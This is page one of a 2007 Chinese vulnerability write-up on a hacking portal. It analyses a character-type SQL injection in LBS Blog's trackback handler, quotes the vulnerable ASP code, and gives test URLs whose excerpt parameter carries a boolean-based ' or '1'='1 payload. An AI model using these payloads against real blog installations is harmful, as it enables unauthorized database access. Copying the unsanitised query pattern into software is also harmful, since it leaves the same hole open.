首页 新闻 文章 软件 动画 搜黑 编程 网校 网址 设计 视频 上传 图文 破解 专题 论坛 热门 虚拟主机 最近更新

 IDC 脚本注入 灰鸽子 DDOS攻击 QQ黑客 3389入侵 加壳脱壳 红客圈 黑页公布 防火墙 操作系统 代理IP 专杀工具 杀毒软件

 漏洞公布 病毒公告 业界动态 黑客新闻 黑客人物 杀毒防护 安全书籍 升级补丁 红客圈子
 入侵检测 漏洞研究 软件评测 操作系统 网管天地 黑客编程 安全防护 Q Q 技巧 防黑信封
 扫描检测 远程监控 脚本注入 拒绝攻击 嗅探监听 木马后门 字典代理 密码破解 黑客博客
 木马教程 脚本入侵 漏洞利用 加密破解 软件应用 安全配置 综合教程 Q Q 动画 网友上传
 Delphi编程 汇编编程 VB编程 VC/C++编程 PB编程 VFP编程 WEB编程 Exploite 数据库编程
国内超人气黑客论坛
定做软件 救援服务

综合 新闻 文章 软件 动画 编程 视频
·搜黑-全球首例黑客资讯搜索
·视频-国内视频学习教学大全
·设计-汇集百家设计网站精华
·编程-13大编程语言全面学习
安全中国首页 > 文章中心 > 漏洞研究
LBS Blog又一注射漏洞含漏洞解析和exp
http://www.anqn.com     时间:2007-7-11 1:48:33      责任编辑:沙磊      网友评论
热 点:

     最近剑心貌似在读LBS的代码,已经挖出几个了。但是好像还不足以刺激SiC发新版。这个洞的补丁看 这里 。

来源:Loveshell

source/src_trackback.asp中的注射

function trackbackSave(){

var tbEntry={"log_id": input["id"],
"url": input["url"],
"title": input["title"],
"excerpt": input["excerpt"],
"blog": input["blog_name"]
}

// These function calls look really horrible
tbEntry.log_id=func.checkInt(tbEntry.log_id);
tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url)));
tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title))));
tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt))));
tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));

if(tbEntry.title=="") tbEntry.title=tbEntry.url;

// Better Leave the error messages below in English
if(!tbEntry.log_id)
trackbackResponse(1, "Invalid Article ID");
if(tbEntry.url=="")
trackbackResponse(1, "Source URL is Blank");
if(tbEntry.url==false||tbEntry.title==false||tbEntry.excerpt==false||tbEntry.blog==false)
trackbackResponse(1, "Content contains blocked words");

var tmpA=connBlog.query("select Count(log_ID) as i FROM blog_Article where log_locked=false AND log_mode<4 AND log_ID="+tbEntry.log_id);
if(tmpA[0]["i"]==0) trackbackResponse(1, "Article does not exist or is locked");
tmpA=connBlog.query("select Count(tb_ID) as i FROM blog_Trackback where tb_Title='"+tbEntry.title+"' AND tb_Excerpt='"+tbEntry.excerpt+"'");
if(tmpA[0]["i"]>0) trackbackResponse(1, "Trackback is already saved");

// Saving trackback

注意
tbEntry.log_id=func.checkInt(tbEntry.log_id);
tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url)));
tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title))));
tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt))));
tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));

log_id被检查为 int 类型了,但是url以及excerpt等等呢?只是wordfilter以及tril以及去掉html的敏感东西而已,对注射是没有影响的,这些东西是从
var tbEntry={"log_id": input["id"],
"url": input["url"],
"title": input["title"],
"excerpt": input["excerpt"],
"blog": input["blog_name"]
}


input里来的哈~~~~,很明显的一个注射嘛!

因为这里注射的特殊性我们要用or,是一个字符类型的注射

http://127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback.asp?url=1&id=1&blog_name=fffff&excerpt=1111&#39;%20or%20&#39;1&#39;=&#39;1
http://127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback.asp?url=1&id=1&blog_name=fffff&excerpt=1111&#39;%20or%20&#39;1&#39;=&#39;2

这样可以看到效果

标志也很明显就是Trackback is already saved

那么好了 exploit也应该出来了

1 2 下一页

·上一篇: 提升权限 把无法删除的病毒扫地出门
·下一篇: 在我看来,BBSXP2007很多注入点

发表评论  打印本文  返回顶部  关闭窗口
最新5条评论 条评论
条评论
名称: 信箱:

相关连接
·OBLOG4.5 商业SQL版 漏洞解析 [2007-7-11]
·LBS blog sql注射漏洞[All version] [2007-6-30]
·菜鸟批量入侵Oblog博客系统 [2007-4-24]
·Google官方上周末Blog被黑 发布虚假消息 [2006-10-30]
·使用网上常见Blog的方法演示(以sohu为例) [2006-10-26]
·Google官方上周末Blog被黑 发布虚假消息 [2006-10-10]
·Cat的blog:暴酷入侵OBLOG全过程 [2006-9-20]
·探讨关于bo-blog的安全隐患 [2006-9-19]
·Oblog3.0漏洞攻击测试实例 [2006-8-21]
·Cat的blog:暴库入侵Oblog [2006-8-8]